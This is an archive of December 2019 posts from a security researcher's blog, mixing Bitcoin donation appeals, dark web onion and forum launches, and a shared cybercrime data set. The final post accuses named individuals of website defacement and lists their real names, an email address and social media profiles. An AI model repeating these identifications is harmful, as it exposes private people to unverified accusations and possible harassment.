
G0t Bitcoin? Consider going through the project proposal today - http://lkzihepprlhxtvbutjedoazbsqd4avmifhpjms3zuq7itceiu4qajwad.onion/

including to make a possible Bitcoin donation using the following Bitcoin Address:

3J8Jt7XCBGtCL6XRLTWhKfRQBmhhqGs4aP

I wanted to say a big thanks to everyone who approached me in terms of the project including to actually

make a donation. The official release is scheduled for January, 2020 and I’ll make sure to keep everyone

posted on current and future project updates.

Stay tuned!

1. https://1.bp.blogspot.com/-ehaEPpBHRKw/XeTGikGH8TI/AAAAAAAAJxY/ACcKr9yGHPgPWqljSdxE-4Ywa-oqdLb6gCLcBGAsYHQ/s1600/Cybertronics.png

Official World Hacker Global Domination Group (WHGDG) Dark Web Onion Launch! (2019-12-02 10:16)

Dear blog readers,

I’ve been spending more time on the Dark Web these days including the active launching of a second Dark

Web Onion and the official launch of the World Hacker Global Domination Group (WHGDG) which is basically a Call

for Papers, Call for Participation and Call for Innovation request on my behalf for the purpose of reaching out to

the U.S Intelligence Community as an independent contractor for the purpose of presenting and eventually getting

funding for a variety of commercial cyber security and hacking including Threat Intelligence and Offensive Cyber

Warfare Projects including the active recruitment of new members.

Check out the Official Dark Web Onion:

http://nexvibpe4xszfx4cp2jldkdyhnjnah5qnckoagoiry3vpyv5eheh55id.onion/

and don’t forget to visit Cybertronics - Virtual Reality Social Network for Hackers and Cyber Security Experts Bitcoin-accepting Project -

http://ca7brwpxmnbssdoh4dfoijyr7zwetob74x3berlvmeekhmkt7zcjdjqd.onion/ and donate today!

How can you participate?

• Visit the Dark Web Onion and go through the Call for Participation, Call for Papers and Call for Innovation and

approach me at ddanchev@cryptogroup.net in case you believe that you can contribute with knowledge, data

and expertise including the technical "know-how" to participate in any of the Key Points mentioned in the Dark Web Onion

Stay tuned for a major Web Site update by the end of the week including the production of an extremely popular

Security Podcast, Security Vlog and an additional set of never-before-published, possibly classified and sensitive

Technical Data and Cyber Security and Hacking resources.

Enjoy!

Dancho Danchev’s Twitter Account - 2010 - Direct Download Link - Historical OSINT (2019-12-02 10:19)

Dear blog readers,

Takes you back doesn’t it? I’ve decided to share with you a [1]direct download link of my old [2]Twitter account

for you to download and go through and to say big thanks to everyone who’s been keeping in touch with me

throughout 2008-2013 including actual research work and related research inquiries.

Consider going through the archive and catching up with some of my research circa 2010-2014 and approach

me - ddanchev@cryptogroup.net with your feedback or just to say hi in case you remember some of the research

which I used to publish back then.

Stay tuned!

1. https://unit-123.org/wp-content/uploads/2019/11/Dancho_Danchev_Tweets_2010-1.zip

2. https://twitter.com/danchodanchev

Join me on Medium! (2019-12-02 10:59)

Dear blog readers,

I wanted to let everyone know that I’ve recently joined [1]Medium and that I intend to post a variety of editorial

type of articles on a daily basis including the fact that I was recently featured as a Top Writer in [2]Privacy.

Missing the editorial? Consider going through my old [3]ZDNet Zero Day Blog content archive including the

following recently published editorial type of articles on Medium:

• [4]Assessing U.S Military Cyber Operational Capabilities to Counter Pro-ISIS Internet Infrastructure

• [5]My Involvement in the Top Secret GCHQ “Lovely Horse” Program and the Existence of the Karma Police

• [6]Kaspersky’s Antivirus Products the NSA and U.S National Security — An Analysis

• [7]Assessment of U.S Intelligence Community Cyber Surveillance Programs and Tradecraft — Part One

• [8]How the NSA utilized Iranian Cyber Proxies To Participate in the BOUNDLESS INFORMANT Program?

• [9]Exposing GCHQ’s Top Secret “GORDIAN KNOT” Cyber Defense Sensor Program — An Analysis

• [10]Exposing GCHQ’s URL-Shortening Service and Its Involvement in Iran’s 2009 Election Protests

Stay tuned!

1. https://medium.com/@danchodanchev

2. https://medium.com/tag/privacy

3. https://www.zdnet.com/meet-the-team/us/dancho-danchev/

4. https://medium.com/@danchodanchev/assessing-u-s-military-cyber-operational-capabilities-to-counter-pro-isis-internet-infrastructure-e4914bd8fb8c

5. https://medium.com/@danchodanchev/my-involvement-in-the-top-secret-gchq-lovely-horse-program-and-the-existence-of-the-karma-police-daaf08b028a2

6. https://medium.com/@danchodanchev/my-involvement-in-the-top-secret-gchq-lovely-horse-program-and-the-existence-of-the-karma-police-daaf08b028a2

7. https://medium.com/@danchodanchev/assessment-of-u-s-intelligence-community-cyber-surveillance-programs-and-tradecraft-part-one-24c29418107b

8. https://medium.com/@danchodanchev/how-the-nsa-utilized-iranian-cyber-proxies-to-participate-in-the-boundless-informant-program-e82045d44848

9. https://medium.com/@danchodanchev/exposing-gchqs-top-secret-gordian-knot-cyber-defense-sensor-program-an-analysis-db64aa8a62ea

10. https://medium.com/@danchodanchev/exposing-gchqs-url-shortening-service-and-its-involvement-in-iran-s-2009-election-protests-6c6a9282630

g0t Bitcoin? - Part Two (2019-12-04 18:15)

Dear blog readers,

I wanted to let you know that I’ve recently changed to a permanent [1]Dark Web Onion address - for my

[2]Cybertronics - Virtual Reality Social Network for Hackers and Security Experts where I’m currently soliciting

Bitcoin donations for the purpose of launching the project in January, 2020.

Got Bitcoin? Consider visiting the Dark Web Onion and making a donation today and stay tuned for the upcoming

updates and actual launch of the project in January, 2020 - http://lkzihepprlhxtvbutjedoazbsqd4avmifhpjms3zuq7itceiu4qajwad.onion/

Stay tuned!

1. https://ddanchev.blogspot.com/2019/08/g0t-bitcoin.html

2. https://ddanchev.blogspot.com/2019/12/new-cybertronics-vr-for-hackers-and.html

Announcing New Hacking Security and Hacktivism-Themed Online Forum Community! Join me Today! (2019-12-12 19:00)

IFRAME: [1]https://www.youtube.com/embed/naiklltDK1w?feature=player_embedded

Dear blog readers,

I’ve recently launched an extremely popular and comprehensive Hacking and Security possibly Hacktivism-Themed

Online Forum Community called "[2]Security is Futile" using the extremely popular [3]PlushForums Platform consisting of over 193 Hacking and Security Topic Categories.

The initial idea behind launching the community is to spread data information and knowledge and to provoke

discussion into various hot Hacking and Security topics including to solicit high-profile VIP Hacker and Security

Experts to actually join the community and contribute with content.

Official "Security is Futile!" Hacking and Security Forum Community URL:

https://forums.offensive-warfare.com

Stay tuned!

1. https://www.youtube.com/embed/naiklltDK1w?feature=player_embedded

2. https://forums.offensive-warfare.com/

3. https://plushforums.com/

Announcing Law Enforcement and OSINT Intelligence Operation "Uncle George" - Join Me Today! - Part Two (2019-12-12 19:12)

Dear blog readers,

I wanted to let you know that I’ve been spending more time doing active Security Industry outreach in terms

of the [1]2019 Cybercrime Forum Data Set and that I’ve already started working with several vendors in terms of

possible OSINT enrichment and actual processing of the data.

Perfect timing to say thanks to Ilya Timchenko and McAfee for actually reaching out and managing to process

the following artifacts from the actual Data Set which I’ve decided to publicly share with everyone who reaches out

and expresses interest in working with me on the Data Set with the idea to possibly assist the Security Community and

Law Enforcement in terms of tracking down the individuals behind these campaigns and actually shutting them down.

Possible Personally Identifiable Artifacts Found in the Actual Data Set Include:

• [2]Cybercriminal Cryptocurrency Addresses

• [3]Cybercriminal Emails

• [4]Cybercriminal ICQ Numbers

• [5]Cybercriminal Phone Numbers

• [6]Cybercriminal QQ IDs

• [7]Cybercriminal Telegram IDs/[8]Telegram IDs

• [9]Cybercriminal Dark Web Onion Addresses

• [10]Cybercriminal Viber Accounts

• [11]Cybercriminal VK Accounts

• [12]Cybercriminal XMPP Accounts

Including the following massive update courtesy of me including all the publicly obtainable [13]Email Addresses

obtained from the 2019 Cybercrime Forum Data Set including all the publicly obtainable [14]IP Addresses obtained

from the 2019 Cybercrime Forum Data Set which appear to be mostly Socks4/Socks5 and publicly accessible

compromised hosts used for "island-hopping" tactics.

I’ll be posting an updated set of analysis and data regarding the currently ongoing [15]Law Enforcement and

OSINT Intelligence Operation "Uncle George" anytime soon.

Approach me at ddanchev@cryptogroup.net in case you’re interested in working with me on this project or

want to obtain access to the actual Data Set for possible OSINT enrichment and research purposes.

Stay tuned!

1. https://ddanchev.blogspot.com/2019/10/announcing-law-enforcement-and-osint.html

2. https://unit-123.org/wp-content/uploads/2019/12/cryptocurrency.txt

3. https://unit-123.org/wp-content/uploads/2019/12/emails.txt

4. https://unit-123.org/wp-content/uploads/2019/12/emails.txt

5. https://unit-123.org/wp-content/uploads/2019/12/phone.txt

6. https://unit-123.org/wp-content/uploads/2019/12/qq.txt

7. https://unit-123.org/wp-content/uploads/2019/12/telegram1.txt

8. https://unit-123.org/wp-content/uploads/2019/12/telegram2.txt

9. https://unit-123.org/wp-content/uploads/2019/12/tor.txt

10. https://unit-123.org/wp-content/uploads/2019/12/viber.txt

11. https://unit-123.org/wp-content/uploads/2019/12/vk.txt

12. https://unit-123.org/wp-content/uploads/2019/12/xmpp.txt

13. https://unit-123.org/wp-content/uploads/2019/12/Misc_01.txt

14. https://unit-123.org/wp-content/uploads/2019/12/Misc_02.txt

15. https://ddanchev.blogspot.com/2019/10/announcing-law-enforcement-and-osint.html

Happy Holidays! (2019-12-23 20:08)

Dear blog readers,

It’s been a pleasure and an honor to serve your needs since December, 2005 when I officially opened this

blog while working as a Managing Director for Astalavista.com - The Underground and I sincerely hope that you’ll

continue to find my research informative and quality enough to further recommend my personal blog to friends and

colleagues including to possibly approach me in terms of seeking additional information regarding a particular blog

post or to actually "say hi" and "keep up the good fight" type of message.

My 2020 primary contact points include:

Personal Email - ddanchev@cryptogroup.net

Social Media Accounts - [1]Twitter, [2]LinkedIn, [3]Facebook, [4]Angellist, [5]YouTube, [6]Medium

IM and Skype ID: [7]dancho_danchev_

Web properties that I’m currently running include - [8]Offensive Warfare 2.0 and [9]Unit-123.org

XMPP/OMEMO ID for Real-Time Conversation: 90184@armadillophone.com which is basically compatible with

[10]ChatSecure [11]Conversations and [12]Dino - feel free to install any of these applications in case you’re not using

them already and feel free to "say hi".

Happy holidays and thanks a lot to everyone who’s been keeping in touch and keeping up the good fight!

Stay tuned!

1. https://twitter.com/dancho_danchev

2. https://linkedin.com/in/danchodanchev

3. https://www.facebook.com/dancho.danchev.1048

4. https://angel.co/dancho-danchev

5. https://www.youtube.com/channel/UC-kG5Hl0irayFMfukwEPKfw

6. https://medium.com/@danchodanchev/

7. https://join.skype.com/invite/cf5gmBfNdeYb

8. https://forums.offensive-warfare.com/

9. https://unit-123.org/

10. https://chatsecure.org/

11. https://conversations.im/

12. https://dino.im/

Exposing High Tech Brazil Hack Team Mass Web Site Defacement Group - An OSINT Analysis (2019-12-27 15:38)

It’s been a while since I’ve last posted a quality update further detailing the inner workings of a high-profile and

prominent Web Site Defacement group that has managed to successfully compromise thousands of Web sites

internationally that also includes Bulgaria’s National Security Agency (DANS) - hxxp://dans.org Web site.

In this post I’ll provide actionable intelligence including personally identifiable information on the people and

the gang behind the campaign including an in-depth analysis of their tactics techniques and procedures including

personal photos and social media accounts of the infamous High Tech Brazil Hack Team who’s responsible for having

successfully defaced over 5,000 legitimate Web Sites internationally.

Team Members Include:

- crazyduck - Real Name: Fabian de Souza Peralazzo

- otrasher - Email: Otrasher@live.com - Social Media Account - https://twitter.com/b1tchx _

- l34NDR0

- wicked

- live

- Smoker

Sample Photos of High Tech Brazil Hack Team Team Members:

Twitter Social Media Accounts known to have participated in the campaign:


Personally Identifiable Information on High Tech Brazil Hack Team Team Members:

• synchr0n1ze

Real Name: Bruno Maglia

Facebook Account Profile: https://www.facebook.com/brunoa qnp ; https://www.facebook.com/brunao.maglia

Related Facebook Account Profiles:

• aceeeeeeeer

Real Name: Gustavo Gemen

Personal Photos:

Facebook Account Profile: https://facebook.com/gustavo.gemen

Related photos:


Related URLs:

https://www.youtube.com/channel/UCBgeuuT9sdFOOkFoGnt1p6w

https://koubacktr.wordpress.com/

I’ll be soon posting an additional set of details on the High Tech Brazil Hack Team and I’ll be definitely looking

forward to sharing the necessary details with the Security Industry and Law Enforcement in an attempt to track down

and prosecute the individuals behind these campaigns.

Stay tuned!